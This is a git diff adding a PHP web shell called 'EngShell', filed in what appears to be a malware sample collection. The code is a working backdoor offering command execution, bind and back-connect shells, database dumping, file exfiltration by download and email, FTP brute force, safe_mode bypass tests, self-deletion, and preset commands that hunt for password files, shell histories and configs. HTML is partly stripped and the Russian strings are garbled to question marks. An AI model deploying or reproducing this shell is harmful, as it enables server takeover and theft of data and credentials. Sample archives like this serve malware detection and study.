diff --git a/PHP/Backdoor.PHP.Agent.ad b/PHP/Backdoor.PHP.Agent.ad new file mode 100644 index 00000000..c6b8ea63 --- /dev/null +++ b/PHP/Backdoor.PHP.Agent.ad @@ -0,0 +1,2226 @@ +Untitled Document + +
+ +
+
+
+
+
+ +
+ + +
+
+
+ "); + } +} + +define('PHPSHELL_VERSION', '9.9'); +?> + + + +HackArt EngShell <?php echo PHPSHELL_VERSION ?> + + + +$v) + { + $_POST[$k] = stripslashes($v); + } + foreach ($_COOKIE as $k=>$v) + { + $_COOKIE[$k] = stripslashes($v); + } + } + +if($auth == 1) { +if (!isset($_SERVER['PHP_AUTH_USER']) || md5($_SERVER['PHP_AUTH_USER'])!==$name || md5($_SERVER['PHP_AUTH_PW'])!==$pass) + { + header('WWW-Authenticate: Basic realm="EngShell"'); + header('HTTP/1.0 401 Unauthorized'); + exit("EngShell : Access Denied"); + } +} +$head = ' + + + + +'; +class zipfile +{ + var $datasec = array(); + var $ctrl_dir = array(); + var $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00"; + var $old_offset = 0; + function unix2DosTime($unixtime = 0) { + $timearray = ($unixtime == 0) ? getdate() : getdate($unixtime); + if ($timearray['year'] < 1980) { + $timearray['year'] = 1980; + $timearray['mon'] = 1; + $timearray['mday'] = 1; + $timearray['hours'] = 0; + $timearray['minutes'] = 0; + $timearray['seconds'] = 0; + } + return (($timearray['year'] - 1980) << 25) | ($timearray['mon'] << 21) | ($timearray['mday'] << 16) | + ($timearray['hours'] << 11) | ($timearray['minutes'] << 5) | ($timearray['seconds'] >> 1); + } + function addFile($data, $name, $time = 0) + { + $name = str_replace('\\', '/', $name); + $dtime = dechex($this->unix2DosTime($time)); + $hexdtime = '\x' . $dtime[6] . $dtime[7] + . '\x' . $dtime[4] . $dtime[5] + . '\x' . $dtime[2] . $dtime[3] + . '\x' . $dtime[0] . $dtime[1]; + eval('$hexdtime = "' . $hexdtime . '";'); + $fr = "\x50\x4b\x03\x04"; + $fr .= "\x14\x00"; + $fr .= "\x00\x00"; + $fr .= "\x08\x00"; + $fr .= $hexdtime; + $unc_len = strlen($data); + $crc = crc32($data); + $zdata = gzcompress($data); + $zdata = substr(substr($zdata, 0, strlen($zdata) - 4), 2); + $c_len = strlen($zdata); + $fr .= pack('V', $crc); + $fr .= pack('V', $c_len); + $fr .= pack('V', $unc_len); + $fr .= pack('v', strlen($name)); + $fr .= pack('v', 0); + $fr .= $name; + $fr .= $zdata; + $this -> datasec[] = $fr; + $cdrec = "\x50\x4b\x01\x02"; + $cdrec .= "\x00\x00"; + $cdrec .= "\x14\x00"; + $cdrec .= "\x00\x00"; + $cdrec .= "\x08\x00"; + $cdrec .= $hexdtime; + $cdrec .= pack('V', $crc); + $cdrec .= pack('V', $c_len); + $cdrec .= pack('V', $unc_len); + $cdrec .= pack('v', strlen($name) ); + $cdrec .= pack('v', 0 ); + $cdrec .= pack('v', 0 ); + $cdrec .= pack('v', 0 ); + $cdrec .= pack('v', 0 ); + $cdrec .= pack('V', 32 ); + $cdrec .= pack('V', $this -> old_offset ); + $this -> old_offset += strlen($fr); + $cdrec .= $name; + $this -> ctrl_dir[] = $cdrec; + } + function file() + { + $data = implode('', $this -> datasec); + $ctrldir = implode('', $this -> ctrl_dir); + return + $data . + $ctrldir . + $this -> eof_ctrl_dir . + pack('v', sizeof($this -> ctrl_dir)) . + pack('v', sizeof($this -> ctrl_dir)) . + pack('V', strlen($ctrldir)) . + pack('V', strlen($data)) . + "\x00\x00"; + } +} +function compress(&$filename,&$filedump,$compress) + { + global $content_encoding; + global $mime_type; + if ($compress == 'bzip' && @function_exists('bzcompress')) + { + $filename .= '.bz2'; + $mime_type = 'application/x-bzip2'; + $filedump = bzcompress($filedump); + } + else if ($compress == 'gzip' && @function_exists('gzencode')) + { + $filename .= '.gz'; + $content_encoding = 'x-gzip'; + $mime_type = 'application/x-gzip'; + $filedump = gzencode($filedump); + } + else if ($compress == 'zip' && @function_exists('gzcompress')) + { + $filename .= '.zip'; + $mime_type = 'application/zip'; + $zipfile = new zipfile(); + $zipfile -> addFile($filedump, substr($filename, 0, -4)); + $filedump = $zipfile -> file(); + } + else + { + $mime_type = 'application/octet-stream'; + } + } +function mailattach($to,$from,$subj,$attach) + { + $headers = "From: $from\r\n"; + $headers .= "MIME-Version: 1.0\r\n"; + $headers .= "Content-Type: ".$attach['type']; + $headers .= "; name=\"".$attach['name']."\"\r\n"; + $headers .= "Content-Transfer-Encoding: base64\r\n\r\n"; + $headers .= chunk_split(base64_encode($attach['content']))."\r\n"; + if(@mail($to,$subj,"",$headers)) { return 1; } + return 0; + } +class my_sql + { + var $host = 'localhost'; + var $port = ''; + var $user = ''; + var $pass = ''; + var $base = ''; + var $db = ''; + var $connection; + var $res; + var $error; + var $rows; + var $columns; + var $num_rows; + var $num_fields; + var $dump; + + function connect() + { + switch($this->db) + { + case 'MySQL': + if(empty($this->port)) { $this->port = '3306'; } + if(!function_exists('mysql_connect')) return 0; + $this->connection = @mysql_connect($this->host.':'.$this->port,$this->user,$this->pass); + if(is_resource($this->connection)) return 1; + break; + case 'MSSQL': + if(empty($this->port)) { $this->port = '1433'; } + if(!function_exists('mssql_connect')) return 0; + $this->connection = @mssql_connect($this->host.','.$this->port,$this->user,$this->pass); + if($this->connection) return 1; + break; + case 'PostgreSQL': + if(empty($this->port)) { $this->port = '5432'; } + $str = "host='".$this->host."' port='".$this->port."' user='".$this->user."' password='".$this->pass."' dbname='".$this->base."'"; + if(!function_exists('pg_connect')) return 0; + $this->connection = @pg_connect($str); + if(is_resource($this->connection)) return 1; + break; + case 'Oracle': + if(!function_exists('ocilogon')) return 0; + $this->connection = @ocilogon($this->user, $this->pass, $this->base); + if(is_resource($this->connection)) return 1; + break; + } + return 0; + } + + function select_db() + { + switch($this->db) + { + case 'MySQL': + if(@mysql_select_db($this->base,$this->connection)) return 1; + break; + case 'MSSQL': + if(@mssql_select_db($this->base,$this->connection)) return 1; + break; + case 'PostgreSQL': + return 1; + break; + case 'Oracle': + return 1; + break; + } + return 0; + } + + function query($query) + { + $this->res=$this->error=''; + switch($this->db) + { + case 'MySQL': + if(false===($this->res=@mysql_query('/*'.chr(0).'*/'.$query,$this->connection))) + { + $this->error = @mysql_error($this->connection); + return 0; + } + else if(is_resource($this->res)) { return 1; } + return 2; + break; + case 'MSSQL': + if(false===($this->res=@mssql_query($query,$this->connection))) + { + $this->error = 'Query error'; + return 0; + } + else if(@mssql_num_rows($this->res) > 0) { return 1; } + return 2; + break; + case 'PostgreSQL': + if(false===($this->res=@pg_query($this->connection,$query))) + { + $this->error = @pg_last_error($this->connection); + return 0; + } + else if(@pg_num_rows($this->res) > 0) { return 1; } + return 2; + break; + case 'Oracle': + if(false===($this->res=@ociparse($this->connection,$query))) + { + $this->error = 'Query parse error'; + } + else + { + if(@ociexecute($this->res)) + { + if(@ocirowcount($this->res) != 0) return 2; + return 1; + } + $error = @ocierror(); + $this->error=$error['message']; + } + break; + } + return 0; + } + function get_result() + { + $this->rows=array(); + $this->columns=array(); + $this->num_rows=$this->num_fields=0; + switch($this->db) + { + case 'MySQL': + $this->num_rows=@mysql_num_rows($this->res); + $this->num_fields=@mysql_num_fields($this->res); + while(false !== ($this->rows[] = @mysql_fetch_assoc($this->res))); + @mysql_free_result($this->res); + if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;} + break; + case 'MSSQL': + $this->num_rows=@mssql_num_rows($this->res); + $this->num_fields=@mssql_num_fields($this->res); + while(false !== ($this->rows[] = @mssql_fetch_assoc($this->res))); + @mssql_free_result($this->res); + if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}; + break; + case 'PostgreSQL': + $this->num_rows=@pg_num_rows($this->res); + $this->num_fields=@pg_num_fields($this->res); + while(false !== ($this->rows[] = @pg_fetch_assoc($this->res))); + @pg_free_result($this->res); + if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;} + break; + case 'Oracle': + $this->num_fields=@ocinumcols($this->res); + while(false !== ($this->rows[] = @oci_fetch_assoc($this->res))) $this->num_rows++; + @ocifreestatement($this->res); + if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;} + break; + } + return 0; + } + function dump($table) + { + if(empty($table)) return 0; + $this->dump=array(); + $this->dump[0] = '## EngShell Dump'; + $this->dump[1] = '## --------------------------------------- '; + $this->dump[2] = '## Created: '.date ("d/m/Y H:i:s"); + $this->dump[3] = '## Database: '.$this->base; + $this->dump[4] = '## Table: '.$table; + $this->dump[5] = '## --------------------------------------- '; + switch($this->db) + { + case 'MySQL': + $this->dump[0] = '## MySQL dump'; + if($this->query('/*'.chr(0).'*/ SHOW CREATE TABLE `'.$table.'`')!=1) return 0; + if(!$this->get_result()) return 0; + $this->dump[] = $this->rows[0]['Create Table']; + $this->dump[] = '## --------------------------------------- '; + if($this->query('/*'.chr(0).'*/ SELECT * FROM `'.$table.'`')!=1) return 0; + if(!$this->get_result()) return 0; + for($i=0;$i<$this->num_rows;$i++) + { + foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @mysql_real_escape_string($v);} + $this->dump[] = 'INSERT INTO `'.$table.'` (`'.@implode("`, `", $this->columns).'`) VALUES (\''.@implode("', '", $this->rows[$i]).'\');'; + } + break; + case 'MSSQL': + $this->dump[0] = '## MSSQL dump'; + if($this->query('SELECT * FROM '.$table)!=1) return 0; + if(!$this->get_result()) return 0; + for($i=0;$i<$this->num_rows;$i++) + { + foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);} + $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');'; + } + break; + case 'PostgreSQL': + $this->dump[0] = '## PostgreSQL dump'; + if($this->query('SELECT * FROM '.$table)!=1) return 0; + if(!$this->get_result()) return 0; + for($i=0;$i<$this->num_rows;$i++) + { + foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);} + $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');'; + } + break; + case 'Oracle': + $this->dump[0] = '## ORACLE dump'; + $this->dump[] = '## under construction'; + break; + default: + return 0; + break; + } + return 1; + } + function close() + { + switch($this->db) + { + case 'MySQL': + @mysql_close($this->connection); + break; + case 'MSSQL': + @mssql_close($this->connection); + break; + case 'PostgreSQL': + @pg_close($this->connection); + break; + case 'Oracle': + @oci_close($this->connection); + break; + } + } + function affected_rows() + { + switch($this->db) + { + case 'MySQL': + return @mysql_affected_rows($this->res); + break; + case 'MSSQL': + return @mssql_affected_rows($this->res); + break; + case 'PostgreSQL': + return @pg_affected_rows($this->res); + break; + case 'Oracle': + return @ocirowcount($this->res); + break; + default: + return 0; + break; + } + } + } +if(!empty($_POST['cmd']) && $_POST['cmd']=="download_file" && !empty($_POST['d_name'])) + { + if(!$file=@fopen($_POST['d_name'],"r")) { err(1,$_POST['d_name']); $_POST['cmd']=""; } + else + { + @ob_clean(); + $filename = @basename($_POST['d_name']); + $filedump = @fread($file,@filesize($_POST['d_name'])); + fclose($file); + $content_encoding=$mime_type=''; + compress($filename,$filedump,$_POST['compress']); + if (!empty($content_encoding)) { header('Content-Encoding: ' . $content_encoding); } + header("Content-type: ".$mime_type); + header("Content-disposition: attachment; filename=\"".$filename."\";"); + echo $filedump; + exit(); + } + } +if(isset($_GET['phpinfo'])) { echo @phpinfo(); echo "
[ BACK ]
"; die(); } +if (!empty($_POST['cmd']) && $_POST['cmd']=="db_query") + { + echo $head; + $sql = new my_sql(); + $sql->db = $_POST['db']; + $sql->host = $_POST['db_server']; + $sql->port = $_POST['db_port']; + $sql->user = $_POST['mysql_l']; + $sql->pass = $_POST['mysql_p']; + $sql->base = $_POST['mysql_db']; + $querys = @explode(';',$_POST['db_query']); + echo ''; + if(!$sql->connect()) echo "
Can't connect to SQL server
"; + else + { + if(!empty($sql->base)&&!$sql->select_db()) echo "
Can't select database
"; + else + { + foreach($querys as $num=>$query) + { + if(strlen($query)>5) + { + echo "Query#".$num." : ".htmlspecialchars($query,ENT_QUOTES)."
"; + switch($sql->query($query)) + { + case '0': + echo "
Error : ".$sql->error."
"; + break; + case '1': + if($sql->get_result()) + { + echo ""; + foreach($sql->columns as $k=>$v) $sql->columns[$k] = htmlspecialchars($v,ENT_QUOTES); + $keys = @implode(" "; + for($i=0;$i<$sql->num_rows;$i++) + { + foreach($sql->rows[$i] as $k=>$v) $sql->rows[$i][$k] = htmlspecialchars($v,ENT_QUOTES); + $values = @implode(" '; + } + echo "
 ", $sql->columns); + echo "
 ".$keys." 
 ",$sql->rows[$i]); + echo '
 '.$values.' 
"; + } + break; + case '2': + $ar = $sql->affected_rows()?($sql->affected_rows()):('0'); + echo "
affected rows : ".$ar."

"; + break; + } + } + } + } + } + echo "
"; + echo in('hidden','db',0,$_POST['db']); + echo in('hidden','db_server',0,$_POST['db_server']); + echo in('hidden','db_port',0,$_POST['db_port']); + echo in('hidden','mysql_l',0,$_POST['mysql_l']); + echo in('hidden','mysql_p',0,$_POST['mysql_p']); + echo in('hidden','mysql_db',0,$_POST['mysql_db']); + echo in('hidden','cmd',0,'db_query'); + echo "
"; + echo "Base: base."\">
"; + echo "


"; + echo "
"; + echo "
[ MBALIK ]
"; die(); + } +if(isset($_GET['delete'])) + { + @unlink(__FILE__); + } +if(isset($_GET['tmp'])) + { + @unlink("/tmp/bdpl"); + @unlink("/tmp/back"); + @unlink("/tmp/bd"); + @unlink("/tmp/bd.c"); + @unlink("/tmp/dp"); + @unlink("/tmp/dpc"); + @unlink("/tmp/dpc.c"); + } +if(isset($_GET['phpini'])) +{ +echo $head; +function U_value($value) + { + if ($value == '') return 'no value'; + if (@is_bool($value)) return $value ? 'TRUE' : 'FALSE'; + if ($value === null) return 'NULL'; + if (@is_object($value)) $value = (array) $value; + if (@is_array($value)) + { + @ob_start(); + print_r($value); + $value = @ob_get_contents(); + @ob_end_clean(); + } + return U_wordwrap((string) $value); + } +function U_wordwrap($str) + { + $str = @wordwrap(@htmlspecialchars($str), 100, '', true); + return @preg_replace('!(&[^;]*)([^;]*;)!', '$1$2', $str); + } +if (@function_exists('ini_get_all')) + { + $r = ''; + echo '', ''; + foreach (@ini_get_all() as $key=>$value) + { + $r .= ''; + } + echo $r; + echo '
Directive
Local Value
Master Value
'.ws(3).''.$key.'
'.U_value($value['local_value']).'
'.U_value($value['global_value']).'
'; + } +echo "
[ BACK ]
"; +die(); +} +if(isset($_GET['cpu'])) + { + echo $head; + echo '
CPU
'; + $cpuf = @file("cpuinfo"); + if($cpuf) + { + $c = @sizeof($cpuf); + for($i=0;$i<$c;$i++) + { + $info = @explode(":",$cpuf[$i]); + if($info[1]==""){ $info[1]="---"; } + $r .= ''; + } + echo $r; + } + else + { + echo ''; + } + echo '
'.ws(3).''.trim($info[0]).'
'.trim($info[1]).'
'.ws(3).'
---
'; + echo "
[ BACK ]
"; + die(); + } +if(isset($_GET['mem'])) + { + echo $head; + echo '
MEMORY
'; + $memf = @file("meminfo"); + if($memf) + { + $c = sizeof($memf); + for($i=0;$i<$c;$i++) + { + $info = explode(":",$memf[$i]); + if($info[1]==""){ $info[1]="---"; } + $r .= ''; + } + echo $r; + } + else + { + echo ''; + } + echo '
'.ws(3).''.trim($info[0]).'
'.trim($info[1]).'
'.ws(3).'
---
'; + echo "
[ BACK ]
"; + die(); + } +$lang=array( +'ru_text1' =>'??????????? ???????', +'ru_text2' =>'?????????? ?????? ?? ???????', +'ru_text3' =>'????????? ???????', +'ru_text4' =>'??????? ??????????', +'ru_text5' =>'???????? ?????? ?? ??????', +'ru_text6' =>'????????? ????', +'ru_text7' =>'??????', +'ru_text8' =>'???????? ?????', +'ru_butt1' =>'?????????', +'ru_butt2' =>'?????????', +'ru_text9' =>'???????? ????? ? ???????? ??? ? /bin/bash', +'ru_text10'=>'??????? ????', +'ru_text11'=>'?????? ??? ???????', +'ru_butt3' =>'???????', +'ru_text12'=>'back-connect', +'ru_text13'=>'IP-?????', +'ru_text14'=>'????', +'ru_butt4' =>'?????????', +'ru_text15'=>'???????? ?????? ? ?????????? ???????', +'ru_text16'=>'????????????', +'ru_text17'=>'????????? ????', +'ru_text18'=>'????????? ????', +'ru_text19'=>'Exploits', +'ru_text20'=>'????????????', +'ru_text21'=>'????? ???', +'ru_text22'=>'datapipe', +'ru_text23'=>'????????? ????', +'ru_text24'=>'????????? ????', +'ru_text25'=>'????????? ????', +'ru_text26'=>'????????????', +'ru_butt5' =>'?????????', +'ru_text28'=>'?????? ? safe_mode', +'ru_text29'=>'?????? ????????', +'ru_butt6' =>'???????', +'ru_text30'=>'???????? ?????', +'ru_butt7' =>'???????', +'ru_text31'=>'???? ?? ??????', +'ru_text32'=>'?????????? PHP ????', +'ru_text33'=>'???????? ??????????? ?????? ??????????? open_basedir ????? ??????? cURL', +'ru_butt8' =>'?????????', +'ru_text34'=>'???????? ??????????? ?????? ??????????? safe_mode ????? ??????? include', +'ru_text35'=>'???????? ??????????? ?????? ??????????? safe_mode ????? ???????? ????? ? mysql', +'ru_text36'=>'???? . ???????', +'ru_text37'=>'?????', +'ru_text38'=>'??????', +'ru_text39'=>'????', +'ru_text40'=>'???? ??????? ???? ??????', +'ru_butt9' =>'????', +'ru_text41'=>'????????? ? ?????', +'ru_text42'=>'?????????????? ?????', +'ru_text43'=>'????????????? ????', +'ru_butt10'=>'?????????', +'ru_butt11'=>'?????????????', +'ru_text44'=>'?????????????? ????? ??????????! ?????? ?????? ??? ??????!', +'ru_text45'=>'???? ????????', +'ru_text46'=>'???????? phpinfo()', +'ru_text47'=>'???????? ???????? php.ini', +'ru_text48'=>'???????? ????????? ??????', +'ru_text49'=>'???????? ??????? ? ???????', +'ru_text50'=>'?????????? ? ??????????', +'ru_text51'=>'?????????? ? ??????', +'ru_text52'=>'????? ??? ??????', +'ru_text53'=>'?????? ? ?????', +'ru_text54'=>'????? ?????? ? ??????', +'ru_butt12'=>'?????', +'ru_text55'=>'?????? ? ??????', +'ru_text56'=>'?????? ?? ???????', +'ru_text57'=>'???????/??????? ????/??????????', +'ru_text58'=>'???', +'ru_text59'=>'????', +'ru_text60'=>'??????????', +'ru_butt13'=>'???????/???????', +'ru_text61'=>'???? ??????', +'ru_text62'=>'?????????? ???????', +'ru_text63'=>'???? ??????', +'ru_text64'=>'?????????? ???????', +'ru_text65'=>'???????', +'ru_text66'=>'???????', +'ru_text67'=>'Chown/Chgrp/Chmod', +'ru_text68'=>'???????', +'ru_text69'=>'????????1', +'ru_text70'=>'????????2', +'ru_text71'=>"?????? ???????? ???????:\r\n- ??? CHOWN - ??? ?????? ???????????? ??? ??? UID (??????) \r\n- ??? ??????? CHGRP - ??? ?????? ??? GID (??????) \r\n- ??? ??????? CHMOD - ????? ????? ? ???????????? ????????????? (???????? 0777)", +'ru_text72'=>'????? ??? ??????', +'ru_text73'=>'?????? ? ?????', +'ru_text74'=>'?????? ? ??????', +'ru_text75'=>'* ????? ???????????? ?????????? ?????????', +'ru_text76'=>'????? ?????? ? ?????? ? ??????? ??????? find', +'ru_text80'=>'???', +'ru_text81'=>'????', +'ru_text82'=>'???? ??????', +'ru_text83'=>'?????????? SQL ???????', +'ru_text84'=>'SQL ??????', +'ru_text85'=>'???????? ??????????? ?????? ??????????? safe_mode ????? ?????????? ?????? ? MSSQL ???????', +'ru_text86'=>'?????????? ????? ? ???????', +'ru_butt14'=>'???????', +'ru_text87'=>'?????????? ?????? ? ?????????? ftp-???????', +'ru_text88'=>'FTP-??????:????', +'ru_text89'=>'???? ?? ftp ???????', +'ru_text90'=>'????? ????????', +'ru_text91'=>'???????????? ?', +'ru_text92'=>'??? ?????????', +'ru_text93'=>'FTP', +'ru_text94'=>'FTP-????????', +'ru_text95'=>'?????? ?????????????', +'ru_text96'=>'?? ??????? ???????? ?????? ?????????????', +'ru_text97'=>'????????? ??????????: ', +'ru_text98'=>'??????? ???????????: ', +'ru_text99'=>'* ? ???????? ?????? ? ?????? ???????????? ??? ???????????? ?? /etc/passwd', +'ru_text100'=>'???????? ?????? ?? ????????? ??? ??????', +'ru_text101'=>'???????????? ????? ???????????? (user -> resu) ??? ???????????? ? ???????? ??????', +'ru_text102'=>'?????', +'ru_text103'=>'???????? ??????', +'ru_text104'=>'???????? ????? ?? ???????? ????', +'ru_text105'=>'????', +'ru_text106'=>'??', +'ru_text107'=>'????', +'ru_butt15'=>'?????????', +'ru_text108'=>'????? ??????', +'ru_text109'=>'????????', +'ru_text110'=>'??????????', +'ru_text111'=>'SQL-?????? : ????', +'ru_text112'=>'???????? ??????????? ?????? ??????????? safe_mode ????? ????????????? ??????? mb_send_mail', +'ru_text113'=>'???????? ??????????? ?????? ??????????? safe_mode, ???????? ???????? ?????????? ? ?????????????? imap_list', +'ru_text114'=>'???????? ??????????? ?????? ??????????? safe_mode, ???????? ??????????? ????? ? ?????????????? imap_body', +'ru_text115'=>'???????? ??????????? ?????? ??????????? safe_mode, ??????????? ?????? ? compress.zlib:// ? copy()', +'ru_text116'=>'?????????? ????', +'ru_text117'=>'?', +'ru_text118'=>'???? ??????????', +'ru_text119'=>'?? ??????? ??????????? ????', +'ru_err0'=>'??????! ?? ???? ???????? ? ???? ', +'ru_err1'=>'??????! ?? ???? ????????? ???? ', +'ru_err2'=>'??????! ?? ??????? ??????? ', +'ru_err3'=>'??????! ?? ??????? ???????????? ? ftp ???????', +'ru_err4'=>'?????? ??????????? ?? ftp ???????', +'ru_err5'=>'??????! ?? ??????? ???????? ?????????? ?? ftp ???????', +'ru_err6'=>'??????! ?? ??????? ????????? ??????', +'ru_err7'=>'?????? ??????????', +/* --------------------------------------------------------------- */ +'eng_text1' =>'EngShell command', +'eng_text2' =>'EngShell command on server', +'eng_text3' =>'Run command', +'eng_text4' =>'Work directory', +'eng_text5' =>'Upload files on server', +'eng_text6' =>'Local file', +'eng_text7' =>'Aliases', +'eng_text8' =>'Select alias', +'eng_butt1' =>'EngShell', +'eng_butt2' =>'Upload', +'eng_text9' =>'Bind port to /bin/bash', +'eng_text10'=>'Port', +'eng_text11'=>'Password for access', +'eng_butt3' =>'Bind', +'eng_text12'=>'back-connect', +'eng_text13'=>'IP', +'eng_text14'=>'Port', +'eng_butt4' =>'Connect', +'eng_text15'=>'Upload files from remote server', +'eng_text16'=>'With', +'eng_text17'=>'Remote file', +'eng_text18'=>'Local file', +'eng_text19'=>'Exploits', +'eng_text20'=>'Use', +'eng_text21'=>' New name', +'eng_text22'=>'datapipe', +'eng_text23'=>'Local port', +'eng_text24'=>'Remote host', +'eng_text25'=>'Remote port', +'eng_text26'=>'Use', +'eng_butt5' =>'Run', +'eng_text28'=>'Work in safe_mode', +'eng_text29'=>'ACCESS DENIED', +'eng_butt6' =>'Change', +'eng_text30'=>'Cat file', +'eng_butt7' =>'Show', +'eng_text31'=>'File not found', +'eng_text32'=>'Eval PHP code', +'eng_text33'=>'Test bypass open_basedir with cURL functions', +'eng_butt8' =>'Test', +'eng_text34'=>'Test bypass safe_mode with include function', +'eng_text35'=>'Test bypass safe_mode with load file in mysql', +'eng_text36'=>'Database . Table', +'eng_text37'=>'Login', +'eng_text38'=>'Password', +'eng_text39'=>'Database', +'eng_text40'=>'Dump database table', +'eng_butt9' =>'Dump', +'eng_text41'=>'Save dump in file', +'eng_text42'=>'Edit files', +'eng_text43'=>'File for edit', +'eng_butt10'=>'Save', +'eng_text44'=>'Can\'t edit file! Only read access!', +'eng_text45'=>'File saved', +'eng_text46'=>'Show phpinfo()', +'eng_text47'=>'Show variables from php.ini', +'eng_text48'=>'Delete temp files', +'eng_butt11'=>'Edit file', +'eng_text49'=>'Delete script from server', +'eng_text50'=>'View cpu info', +'eng_text51'=>'View memory info', +'eng_text52'=>'Find text', +'eng_text53'=>'In dirs', +'eng_text54'=>'Find text in files', +'eng_butt12'=>'Find', +'eng_text55'=>'Only in files', +'eng_text56'=>'Nothing :(', +'eng_text57'=>'Create/Delete File/Dir', +'eng_text58'=>'name', +'eng_text59'=>'file', +'eng_text60'=>'dir', +'eng_butt13'=>'Create/Delete', +'eng_text61'=>'File created', +'eng_text62'=>'Dir created', +'eng_text63'=>'File deleted', +'eng_text64'=>'Dir deleted', +'eng_text65'=>'Create', +'eng_text66'=>'Delete', +'eng_text67'=>'Chown/Chgrp/Chmod', +'eng_text68'=>'Command', +'eng_text69'=>'param1', +'eng_text70'=>'param2', +'eng_text71'=>"Second commands param is:\r\n- for CHOWN - name of new owner or UID\r\n- for CHGRP - group name or GID\r\n- for CHMOD - 0777, 0755...", +'eng_text72'=>'Text for find', +'eng_text73'=>'Find in folder', +'eng_text74'=>'Find in files', +'eng_text75'=>'* you can use regexp', +'eng_text76'=>'Search text in files via find', +'eng_text80'=>'Type', +'eng_text81'=>'Net', +'eng_text82'=>'Databases', +'eng_text83'=>'Run SQL query', +'eng_text84'=>'SQL query', +'eng_text85'=>'Test bypass safe_mode with commands execute via MSSQL server', +'eng_text86'=>'Download files from server', +'eng_butt14'=>'Download', +'eng_text87'=>'Download files from remote ftp-server', +'eng_text88'=>'FTP-server:port', +'eng_text89'=>'File on ftp', +'eng_text90'=>'Transfer mode', +'eng_text91'=>'Archivation', +'eng_text92'=>'without archivation', +'eng_text93'=>'FTP', +'eng_text94'=>'FTP-bruteforce', +'eng_text95'=>'Users list', +'eng_text96'=>'Can\'t get users list', +'eng_text97'=>'checked: ', +'eng_text98'=>'success: ', +'eng_text99'=>'* use username from /etc/passwd for ftp login and password', +'eng_text100'=>'Send file to remote ftp server', +'eng_text101'=>'Use reverse (user -> resu) login for password', +'eng_text102'=>'Mail', +'eng_text103'=>'Kirim Email', +'eng_text104'=>'Kirim file ke email', +'eng_text105'=>'To', +'eng_text106'=>'From', +'eng_text107'=>'Subj', +'eng_butt15'=>'Send', +'eng_text108'=>'Mail', +'eng_text109'=>'Hide', +'eng_text110'=>'Show', +'eng_text111'=>'SQL-Server : Port', +'eng_text112'=>'Test bypass safe_mode with function mb_send_mail', +'eng_text113'=>'Test bypass safe_mode, view dir list via imap_list', +'eng_text114'=>'Test bypass safe_mode, view file contest via imap_body', +'eng_text115'=>'Test bypass safe_mode, copy file via compress.zlib:// in function copy()', +'eng_text116'=>'Copy from', +'eng_text117'=>'to', +'eng_text118'=>'File copied', +'eng_text119'=>'Cant copy file', +'eng_err0'=>'Error! Can\'t write in file ', +'eng_err1'=>'Error! Can\'t read file ', +'eng_err2'=>'Error! Can\'t create ', +'eng_err3'=>'Error! Can\'t connect to ftp', +'eng_err4'=>'Error! Can\'t login on ftp server', +'eng_err5'=>'Error! Can\'t change dir on ftp', +'eng_err6'=>'Error! Can\'t sent mail', +'eng_err7'=>'Mail send', +); +/* +?????? ?????? +????????? ???????? ????????????? ?????? ????? ? ???-?? ??????. ( ??????? ????????? ???? ????????? ???? ) +?? ?????? ???? ????????? ??? ???????? ???????. +*/ +$aliases=array( +'find suid files'=>'find / -type f -perm -04000 -ls', +'find suid files in current dir'=>'find . -type f -perm -04000 -ls', +'find sgid files'=>'find / -type f -perm -02000 -ls', +'find sgid files in current dir'=>'find . -type f -perm -02000 -ls', +'find config.inc.php files'=>'find / -type f -name config.inc.php', +'find config.inc.php files in current dir'=>'find . -type f -name config.inc.php', +'find config* files'=>'find / -type f -name "config*"', +'find config* files in current dir'=>'find . -type f -name "config*"', +'find all writable files'=>'find / -type f -perm -2 -ls', +'find all writable files in current dir'=>'find . -type f -perm -2 -ls', +'find all writable directories'=>'find / -type d -perm -2 -ls', +'find all writable directories in current dir'=>'find . -type d -perm -2 -ls', +'find all writable directories and files'=>'find / -perm -2 -ls', +'find all writable directories and files in current dir'=>'find . -perm -2 -ls', +'find all service.pwd files'=>'find / -type f -name service.pwd', +'find service.pwd files in current dir'=>'find . -type f -name service.pwd', +'find all .htpasswd files'=>'find / -type f -name .htpasswd', +'find .htpasswd files in current dir'=>'find . -type f -name .htpasswd', +'find all .bash_history files'=>'find / -type f -name .bash_history', +'find .bash_history files in current dir'=>'find . -type f -name .bash_history', +'find all .mysql_history files'=>'find / -type f -name .mysql_history', +'find .mysql_history files in current dir'=>'find . -type f -name .mysql_history', +'find all .fetchmailrc files'=>'find / -type f -name .fetchmailrc', +'find .fetchmailrc files in current dir'=>'find . -type f -name .fetchmailrc', +'list file attributes on a Linux second extended file system'=>'lsattr -va', +'Cek Port yg terbuka'=>'netstat -an | grep -i listen', +'Cek File passwd'=>'more /etc/passwd', +'Lihat IP shell'=>'/sbin/ifconfig | grep inet', +'Lihat VHOST'=>'cat /etc/hosts', +'Lihat domain apa saja yg ada disini'=>'ls -lia /var/named', +'----------------------------------------------------------------------------------------------------'=>'ls -la' +); +$table_up1 = "
¤ "; +$table_up2 = " «
"; +$table_up3 = ""; +$arrow = " Y"; +$lb = "["; +$rb = "]"; +$font = ""; +$ts = "
"; +$table_end1 = "
"; +$te = "
"; +$fs = "
"; +$fe = "
"; + +if(isset($_GET['users'])) + { + if(!$users=get_users()) { echo "
".$lang[$language.'_text96']."
"; } + else + { + echo '
'; + foreach($users as $user) { echo $user."
"; } + echo '
'; + } + echo "
[ BACK ]
